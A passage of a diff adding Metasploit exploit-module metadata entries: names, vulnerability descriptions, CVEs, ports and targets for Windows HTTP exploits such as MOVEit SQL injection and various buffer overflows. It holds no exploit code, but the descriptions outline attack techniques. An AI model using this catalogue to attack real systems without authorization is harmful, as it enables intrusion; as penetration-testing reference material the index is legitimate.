"needs_cleanup": null + }, + "exploit_windows/http/mcafee_epolicy_source": { + "name": "McAfee ePolicy Orchestrator / ProtectionPilot Overflow", + "fullname": "exploit/windows/http/mcafee_epolicy_source", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-07-17", + "type": "exploit", + "author": [ + "muts ", + "xbxice ", + "hdm ", + "aushack " + ], + "description": "This is an exploit for the McAfee HTTP Server (NAISERV.exe).\n McAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are\n known to be vulnerable. By sending a large 'Source' header, the stack can\n be overwritten. This module is based on the exploit by xbxice and muts.\n Due to size constraints, this module uses the Egghunter technique.", + "references": [ + "CVE-2006-5156", + "OSVDB-29421", + "EDB-2467", + "BID-20288" + ], + "platform": "Windows", + "arch": "x86", + "rport": 81, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "ePo 2.5.1 (Service Pack 1)", + "ePo 3.5.0/ProtectionPilot 1.1.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/mcafee_epolicy_source.rb", + "is_install_path": true, + "ref_name": "windows/http/mcafee_epolicy_source", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/mdaemon_worldclient_form2raw": { + "name": "MDaemon WorldClient form2raw.cgi Stack Buffer Overflow", + "fullname": "exploit/windows/http/mdaemon_worldclient_form2raw", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-12-29", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in Alt-N MDaemon SMTP server for\n versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default),\n a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe,\n by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default),\n the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based\n overflow occurs when an excessively long From field is specified.\n The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes.\n Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait.\n\n Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very\n reliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will\n continue to crash/execute the payload until the CGI output is manually deleted\n from the queue in C:\\MDaemon\\RawFiles\\*.raw.", + "references": [ + "CVE-2003-1200", + "OSVDB-3255", + "BID-9317" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal MDaemon.exe", + "Debugging test" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb", + "is_install_path": true, + "ref_name": "windows/http/mdaemon_worldclient_form2raw", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/minishare_get_overflow": { + "name": "Minishare 1.4.1 Buffer Overflow", + "fullname": "exploit/windows/http/minishare_get_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-11-07", + "type": "exploit", + "author": [ + "acaro " + ], + "description": "This is a simple buffer overflow for the minishare web\n server. This flaw affects all versions prior to 1.4.2. This\n is a plain stack buffer overflow that requires a \"jmp esp\" to reach\n the payload, making this difficult to target many platforms\n at once. This module has been successfully tested against\n 1.4.1. Version 1.3.4 and below do not seem to be vulnerable.", + "references": [ + "CVE-2004-2271", + "OSVDB-11530", + "BID-11620", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Windows 2000 SP0-SP3 English", + "Windows 2000 SP4 English", + "Windows XP SP0-SP1 English", + "Windows XP SP2 English", + "Windows 2003 SP0 English", + "Windows 2003 SP1 English", + "Windows 2003 SP2 English", + "Windows NT 4.0 SP6", + "Windows XP SP2 German", + "Windows XP SP2 Polish", + "Windows XP SP2 French", + "Windows XP SP3 French" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/minishare_get_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/minishare_get_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/miniweb_upload_wbem": { + "name": "MiniWeb (Build 300) Arbitrary File Upload", + "fullname": "exploit/windows/http/miniweb_upload_wbem", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-04-09", + "type": "exploit", + "author": [ + "AkaStep", + "bcoles " + ], + "description": "This module exploits a vulnerability in MiniWeb HTTP server (build 300).\n The software contains a file upload vulnerability that allows an\n unauthenticated remote attacker to write arbitrary files to the file system.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine as an exe file, and then upload another mof file, which enables\n WMI (Management Instrumentation service) to execute the uploaded payload.\n Please note that this module currently only works for Windows before Vista.", + "references": [ + "OSVDB-92198", + "OSVDB-92200", + "PACKETSTORM-121168" + ], + "platform": "Windows", + "arch": "", + "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "MiniWeb build 300 on Windows (Before Vista)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/miniweb_upload_wbem.rb", + "is_install_path": true, + "ref_name": "windows/http/miniweb_upload_wbem", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/moveit_cve_2023_34362": { + "name": "MOVEit SQL Injection vulnerability", + "fullname": "exploit/windows/http/moveit_cve_2023_34362", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-05-31", + "type": "exploit", + "author": [ + "sfewer-r7", + "rbowes-r7", + "bwatters-r7" + ], + "description": "This module exploits an SQL injection vulnerability in the MOVEit Transfer web application\n that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database.\n Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an\n attacker can leverage an information leak be able to upload a .NET deserialization payload.", + "references": [ + "CVE-2023-34362", + "URL-https://github.com/sfewer-r7/CVE-2023-34362", + "URL-https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis", + "URL-https://www.wiz.io/blog/cve-2023-34362" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command" + ], + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/exploits/windows/http/moveit_cve_2023_34362.rb", + "is_install_path": true, + "ref_name": "windows/http/moveit_cve_2023_34362", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/navicopa_get_overflow": { + "name": "NaviCOPA 2.0.1 URL Handling Buffer Overflow", + "fullname": "exploit/windows/http/navicopa_get_overflow", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-09-28", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in NaviCOPA 2.0.1.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.", + "references": [ + "CVE-2006-5112", + "OSVDB-29257", + "BID-20250" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "NaviCOPA 2.0.1 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/navicopa_get_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/navicopa_get_overflow", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/netdecision_http_bof": { + "name": "NetDecision 4.5.1 HTTP Server Buffer Overflow", + "fullname": "exploit/windows/http/netdecision_http_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-02-24", + "type": "exploit", + "author": [ + "Prabhu S Angadi", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in NetDecision's HTTP service\n (located in C:\\Program Files\\NetDecision\\Bin\\HttpSvr.exe). By supplying a\n long string of data to the URL, an overflow may occur if the data gets handled\n by HTTP Server's active window. In other words, in order to gain remote code\n execution, the victim is probably looking at HttpSvr's window.", + "references": [ + "CVE-2012-1465", + "OSVDB-79651", + "URL-http://web.archive.org/web/20121024124508/http://secunia.com/advisories/48168/", + "URL-http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "NetDecision 4.5.1 on XP SP3" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/http/netdecision_http_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/netdecision_http_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/netgear_nms_rce": { + "name": "NETGEAR ProSafe Network Management System 300 Arbitrary File Upload", + "fullname": "exploit/windows/http/netgear_nms_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-02-04", + "type": "exploit", + "author": [ + "Ege BALCI ", + "Pedro Ribeiro " + ], + "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has multiple vulnerabilities that can allow an unauthenticated remote\n attacker to execute code as SYSTEM user. Vulnerabilities include authentication bypass,\n SQL injection, arbitrary file upload, and privilege escalation across various versions.\n This module is able to spawn a meterpreter session by chaining together two specific\n vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.\n This module has been tested with versions 1.5.0.2, 1.4.0.17, 1.1.0.13, 1.7.0.12, and 1.7.0.1.", + "references": [ + "ZDI-23-920", + "ZDI-23-918", + "CVE-2023-38096", + "CVE-2023-38098", + "CVE-2016-1525", + "US-CERT-VU-777024", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt", + "URL-https://seclists.org/fulldisclosure/2016/Feb/30", + "URL-https://kb.netgear.com/000065707/Security-Advisory-for-Multiple-Vulnerabilities-on-the-ProSAFE-Network-Management-System-PSV-2023-0024-PSV-2023-0025" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "NETGEAR ProSafe Network Management System 300 / Windows" + ], + "mod_time": "2023-08-02 18:03:57 +0000", + "path": "/modules/exploits/windows/http/netgear_nms_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/netgear_nms_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/netmotion_mobility_mvcutil_deserialization": { + "name": "NetMotion Mobility Server MvcUtil Java Deserialization", + "fullname": "exploit/windows/http/netmotion_mobility_mvcutil_deserialization", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-02-08", + "type": "exploit", + "author": [ + "mr_me", + "wvu " + ], + "description": "This module exploits an unauthenticated Java deserialization in the\n NetMotion Mobility server's MvcUtil.valueStringToObject() method, as\n invoked through the /mobility/Menu/isLoggedOn endpoint, to execute\n code as the SYSTEM account.\n\n Mobility server versions 11.x before 11.73 and 12.x before 12.02 are\n vulnerable. Tested against 12.01.09045 on Windows Server 2016.", + "references": [ + "CVE-2021-26914", + "URL-https://ssd-disclosure.com/ssd-advisory-netmotion-mobility-server-multiple-deserialization-of-untrusted-data-lead-to-rce/", + "URL-https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020", + "URL-https://srcincite.io/advisories/src-2021-0007/" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2021-07-08 21:26:35 +0000", + "path": "/modules/exploits/windows/http/netmotion_mobility_mvcutil_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/http/netmotion_mobility_mvcutil_deserialization", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/northstar_c2_xss_to_agent_rce": { + "name": "NorthStar C2 XSS to Agent RCE", + "fullname": "exploit/windows/http/northstar_c2_xss_to_agent_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-03-12", + "type": "exploit", + "author": [ + "h00die", + "chebuya" + ], + "description": "NorthStar C2, prior to commit 7674a44 on March 11 2024, contains a vulnerability where the logs page is\n vulnerable to a stored xss.\n An unauthenticated user can simulate an agent registration to cause the XSS and take over a users session.\n With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts\n (agents), and kill the original agent.\n\n Successfully tested against NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 running on\n Ubuntu 22.04. The agent was running on Windows 10 19045.", + "references": [ + "URL-https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/", + "URL-https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc", + "URL-https://github.com/EnginDemirbilek/NorthStarC2/commit/7674a4457fca83058a157c03aa7bccd02f4a213c", + "CVE-2024-28741" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Target" + ], + "mod_time": "2024-04-24 16:54:58 +0000", + "path": "/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/northstar_c2_xss_to_agent_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "event-dependent" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/novell_imanager_upload": { + "name": "Novell iManager getMultiPartParameters Arbitrary File Upload", + "fullname": "exploit/windows/http/novell_imanager_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-10-01", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a directory traversal vulnerability which\n allows remote attackers to upload and execute arbitrary code.\n\n PortalModuleInstallManager", + "references": [ + "OSVDB-68320", + "ZDI-10-190", + "URL-http://www.novell.com/support/viewContent.do?externalId=7006515&sliceId=2" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Universal Windows Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/novell_imanager_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/novell_imanager_upload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/novell_mdm_lfi": { + "name": "Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability", + "fullname": "exploit/windows/http/novell_mdm_lfi", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-03-13", + "type": "exploit", + "author": [ + "steponequit", + "Andrea Micalizzi (aka rgod)" + ], + "description": "This module exercises a vulnerability in Novel Zenworks Mobile Management's Mobile Device Management component\n which can allow unauthenticated remote code execution. Due to a flaw in the MDM.php script's input validation,\n remote attackers can both upload and execute code via a directory traversal flaw exposed in the 'language'\n parameter of a POST call to DUSAP.php.", + "references": [ + "CVE-2013-1081", + "OSVDB-91119", + "ZDI-13-087", + "URL-http://www.novell.com/support/kb/doc.php?id=7011895" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Novell Zenworks Mobile Device Management on Windows" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/http/novell_mdm_lfi.rb", + "is_install_path": true, + "ref_name": "windows/http/novell_mdm_lfi", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/novell_messenger_acceptlang": { + "name": "Novell Messenger Server 2.0 Accept-Language Overflow", + "fullname": "exploit/windows/http/novell_messenger_acceptlang", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-04-13", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in Novell GroupWise\n Messenger Server v2.0. This flaw is triggered by any HTTP\n request with an Accept-Language header greater than 16 bytes.\n To overwrite the return address on the stack, we must first\n pass a memcpy() operation that uses pointers we supply. Due to the\n large list of restricted characters and the limitations of the current\n encoder modules, very few payloads are usable.", + "references": [ + "CVE-2006-0992", + "OSVDB-24617", + "BID-17503" + ], + "platform": "Windows", + "arch": "", + "rport": 8300, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Groupwise Messenger DClient.dll v10510.37" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/novell_messenger_acceptlang.rb", + "is_install_path": true, + "ref_name": "windows/http/novell_messenger_acceptlang", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/nowsms": { + "name": "Now SMS/MMS Gateway Buffer Overflow", + "fullname": "exploit/windows/http/nowsms", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-02-19", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Now SMS/MMS Gateway v2007.06.27.\n By sending a specially crafted GET request, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2008-0871", + "OSVDB-42953", + "BID-27896" + ], + "platform": "Windows", + "arch": "", + "rport": 8800, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Now SMS/MMS Gateway v2007.06.27" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/nowsms.rb", + "is_install_path": true, + "ref_name": "windows/http/nowsms", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/nscp_authenticated_rce": { + "name": "NSClient++ 0.5.2.35 - ExternalScripts Authenticated Remote Code Execution", + "fullname": "exploit/windows/http/nscp_authenticated_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-10-20", + "type": "exploit", + "author": [ + "kindredsec", + "Yann Castel (yann.castel " + ], + "description": "This module allows an attacker with knowledge of the admin password of NSClient++\n to start a privilege shell.\n For this module to work, both web interface of NSClient++ and `ExternalScripts` feature\n should be enabled.", + "references": [ + "EDB-48360" + ], + "platform": "Windows", + "arch": "x64", + "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/http/nscp_authenticated_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/nscp_authenticated_rce", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/oats_weblogic_console": { + "name": "Oracle Application Testing Suite WebLogic Server Administration Console War Deployment", + "fullname": "exploit/windows/http/oats_weblogic_console", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-03-13", + "type": "exploit", + "author": [ + "Steven Seeley", + "sinn3r " + ], + "description": "This module abuses a feature in WebLogic Server's Administration Console to install\n a malicious Java application in order to gain remote code execution. Authentication\n is required, however by default, Oracle ships with a \"oats\" account that you could\n log in with, which grants you administrator access.", + "references": [], + "platform": "Java", + "arch": "java", + "rport": 8088, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "WebLogic Server Administration Console 12 or prior" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/oats_weblogic_console.rb", + "is_install_path": true, + "ref_name": "windows/http/oats_weblogic_console", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/octopusdeploy_deploy": { + "name": "Octopus Deploy Authenticated Code Execution", + "fullname": "exploit/windows/http/octopusdeploy_deploy", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-05-15", + "type": "exploit", + "author": [ + "James Otten " + ], + "description": "This module can be used to execute a payload on an Octopus Deploy server given\n valid credentials or an API key. The payload is executed as a powershell script step\n on the Octopus Deploy server during a deployment.", + "references": [ + "URL-https://octopus.com" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Powershell" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/http/octopusdeploy_deploy.rb", + "is_install_path": true, + "ref_name": "windows/http/octopusdeploy_deploy", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/oracle9i_xdb_pass": { + "name": "Oracle 9i XDB HTTP PASS Overflow (win32)", + "fullname": "exploit/windows/http/oracle9i_xdb_pass", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-08-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the authorization\n code of the Oracle 9i HTTP XDB service. David Litchfield,\n has illustrated multiple vulnerabilities in the Oracle\n 9i XML Database (XDB), during a seminar on \"Variations\n in exploit methods between Linux and Windows\" presented\n at the Blackhat conference.", + "references": [ + "CVE-2003-0727", + "OSVDB-2449", + "BID-8375", + "URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Oracle 9.2.0.1 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/oracle9i_xdb_pass.rb", + "is_install_path": true, + "ref_name": "windows/http/oracle9i_xdb_pass", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/oracle_beehive_evaluation": { + "name": "Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability", + "fullname": "exploit/windows/http/oracle_beehive_evaluation", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-06-09", + "type": "exploit", + "author": [ + "1c239c43f521145fa8385d64a9c32243", + "mr_me ", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Oracle BeeHive. The processEvaluation method\n found in voice-servlet can be abused to write a malicious file onto the target machine, and\n gain remote arbitrary code execution under the context of SYSTEM.", + "references": [ + "CVE-2010-4417", + "ZDI-11-020", + "URL-http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html" + ], + "platform": "Windows", + "arch": "", + "rport": 7777, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Oracle Beehive 2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/oracle_beehive_evaluation.rb", + "is_install_path": true, + "ref_name": "windows/http/oracle_beehive_evaluation", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/oracle_beehive_prepareaudiotoplay": { + "name": "Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload", + "fullname": "exploit/windows/http/oracle_beehive_prepareaudiotoplay", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-11-10", + "type": "exploit", + "author": [ + "mr_me ", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Oracle BeeHive. The prepareAudioToPlay method\n found in voice-servlet can be abused to write a malicious file onto the target machine, and\n gain remote arbitrary code execution under the context of SYSTEM. Authentication is not\n required to exploit this vulnerability.", + "references": [ + "ZDI-15-550", + "URL-http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" + ], + "platform": "Windows", + "arch": "", + "rport": 7777, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Oracle Beehive 2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb", + "is_install_path": true, + "ref_name": "windows/http/oracle_beehive_prepareaudiotoplay", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/oracle_btm_writetofile": { + "name": "Oracle Business Transaction Management FlashTunnelService Remote Code Execution", + "fullname": "exploit/windows/http/oracle_btm_writetofile", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-08-07", + "type": "exploit", + "author": [ + "rgod ", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits abuses the FlashTunnelService SOAP web service on Oracle\n Business Transaction Management 12.1.0.7 to upload arbitrary files, without\n authentication, using the WriteToFile method. The same method contains a directory\n traversal vulnerability, which allows to upload the files to arbitrary locations.\n\n In order to execute remote code two techniques are provided. If the Oracle app has\n been deployed in the same WebLogic Samples Domain a JSP can be uploaded to the web\n root. If a new Domain has been used to deploy the Oracle application, the Windows\n Management Instrumentation service can be used to execute arbitrary code.\n\n Both techniques have been successfully tested on default installs of Oracle BTM\n 12.1.0.7, Weblogic 12.1.1 and Windows 2003 SP2. Default path traversal depths are\n provided, but the user can configure the traversal depth using the DEPTH option.", + "references": [ + "OSVDB-85087", + "BID-54839", + "EDB-20318" + ], + "platform": "Java,Windows", + "arch": "", + "rport": 7001, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Oracle BTM 12.1.0.7 / Weblogic 12.1.1 with Samples Domain / Java", + "Oracle BTM 12.1.0.7 / Windows 2003 SP2 through WMI" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/http/oracle_btm_writetofile.rb", + "is_install_path": true, + "ref_name": "windows/http/oracle_btm_writetofile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/oracle_endeca_exec": { + "name": "Oracle Endeca Server Remote Command Execution", + "fullname": "exploit/windows/http/oracle_endeca_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-07-16", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a command injection vulnerability on the Oracle Endeca\n Server 7.4.0. The vulnerability exists on the createDataStore method from the\n controlSoapBinding web service. The vulnerable method only exists on the 7.4.0\n branch and isn't available on the 7.5.5.1 branch. In addition, the injection\n has been found to be Windows specific. This module has been tested successfully\n on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).", + "references": [ + "CVE-2013-3763", + "BID-61217", + "OSVDB-95269", + "ZDI-13-190", + "URL-http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html" + ], + "platform": "Windows", + "arch": "x64, x86", + "rport": 7770, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/http/oracle_endeca_exec.rb", 